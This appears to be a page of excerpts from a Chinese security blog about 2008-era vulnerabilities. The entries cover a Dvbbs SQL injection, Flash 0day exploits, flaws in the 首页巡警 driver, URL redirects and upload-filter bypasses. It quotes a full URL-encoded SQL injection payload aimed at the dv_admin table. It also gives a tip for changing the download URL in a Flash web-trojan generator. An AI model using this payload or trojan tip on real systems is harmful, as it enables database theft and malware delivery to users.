来源:80sec
漏洞公告:http://seclists.org/bugtraq/2008/May/0330.html
利用方式:一个典型的sql注射漏洞,按照公告里说的用
password=123123&codestr=71&CookieDate=2&userhidden=2&comeurl=index.asp&submit=%u7ACB%u5373%u767B%u5F55&ajaxPost=1&username=where%2527%2520and%25201%253D%2528select%2520count%2528*%2529%2520from%2520dv_admin%2520where%2520left%2528username%252C1%2529%253D%2527a%2527%2529%2520and%2520%25271%2527%253D%25271
就可触发.
阅读全文 »
Tags: Dvbbs,
SQL Injection,
SQL注入
作者:racle
来源:天阳网络技术论坛
手记:
——————————————
首先必须感谢的X.G.C.Team的OPEN在几个关键的地方给予我分析,解决办法的帮助.与及咱们论坛好几位兄弟的帮助.最终我才把这个东西给分析出来..
——————————————
最近FLASH出了几个0DAY,论坛也帖了相关的新闻信息(请见:http://bbs.tian6.com/viewthread.php?tid=4434&extra=&page=1).我也约在5天前开始对此进行研究.我记得同时间邪恶八进制也有人开始同样的研究.到目前为止,该0DAY可以影响到90.115这个版本.而邪八那边的研究,先在两天前宣布成功完成.这又给我带来不小的压力..
阅读全文 »
Tags: 0day,
Exploit,
Flash,
网马
鬼仔注:昨天发了open写的Flash 0day生成器,当时忘了说了,是在赏月那里看到的。结果今天open跟我说发出来之后,好多人找他问修改方法,所以就有了现在这篇文章。
来源:open’s blog
鬼仔网站上公布了生成器。在这我就粗略说一下
把那个ODAY的网址改为明文的方法。
以我BLOG所上传的样本为例:
定位到文件的FD位置后。把它改为51
之后的下载网址你想改啥就啥
阅读全文 »
Tags: 0day,
Exploit,
Flash,
网马
作者:MJ0011
来源:MJ0011的内核驱动研究所
首页巡警v1.2及以下所有版本的IRP_MJ_DEVICE_CONTROL处理例程存在 任意内核地址写入漏洞
该处理例程有两处地方都存在任意地址写入漏洞,其中一处可利用做本地权限提升,可在任意权限用户下执行,并写入任意数据到任意内核地址。
引发错误的原因是首页巡警的驱动开发者未能正确理解i/o传输方式导致的。首页巡警所有的数据传递都是通过MOTHOD_BUFFERED的io control code来执行的,根据MSDN中描述:
阅读全文 »
Tags: 漏洞,
首页巡警
作者:MJ0011
来源:MJ0011的内核驱动研究所
首页巡警v1.2版加入了一个校验,在发送IRP_MJ_CREATE请求到其驱动时,会打开当前进程的 SectionObject->SegmentObject->BaseAddress->FileObject,并打开进程文件进行 校验,若不是IeGuard的话,就拒绝操作其驱动
不过,同样非常轻易可以绕过
阅读全文 »
Tags: 首页巡警
作者:空虚浪子心[XGC]
来源:IT168安全频道
一、url跳转漏洞遍布各大网站
【IT168专稿】url跳转漏洞遍布各大网站,简单看一下,THE9、sohu等居然都存在这个漏洞!我们就拿sohu为例,讲一下该漏洞。来到 sohu的用户注册页面,可以看到,在IE地址栏里,默认写着http://passport.sohu.com/web /signup.jsp?appid=1000&ru=http://login.mail.sohu.com/reg /signup_success.jsp。
阅读全文 »
Tags: URL跳转
作者:darkne2s
来源:大能寺
好像大牛些都有flash exp了.不过10个人有9个人说不好用。这出乎我的意料。按道理说这个不是人的漏洞应该很好用才是。而且我也经常不定期的收集世界各地的user agent和OS,activex情况.
flash我搜集的情况是超过300台的机器里面在使用flash9-9e的winxp有超过90%.
阅读全文 »
Tags: Flash,
Tips
Author : Psiczn
Website: www.psiczn.uni.cc
Contact: [email protected]
Note : If you are going to post this little paper in some site please put the source and the author, this paper have copyright.
This paper is only for educational purposes
Well I was looking my Blogspot and I saw something very bad, all the post sucks there is no a good one, so I make the decision to make a good one. First sorry if my English is not good I’m constantly practice. Ok let’s start with this little paper, what do you think when you see a page with a upload option ? Yes everybody think there is maybe a very nice bug for me. There are different ways to bypass the upload, you can change the name of the file like this “file.php.jpg” but the majority of the administrators or webmasters fix that bug because is so popular. But we are gonna talk about the bypass in the headers, there are a lot of vulnerable pages and this is a bug of high risk.
阅读全文 »
Tags: Injection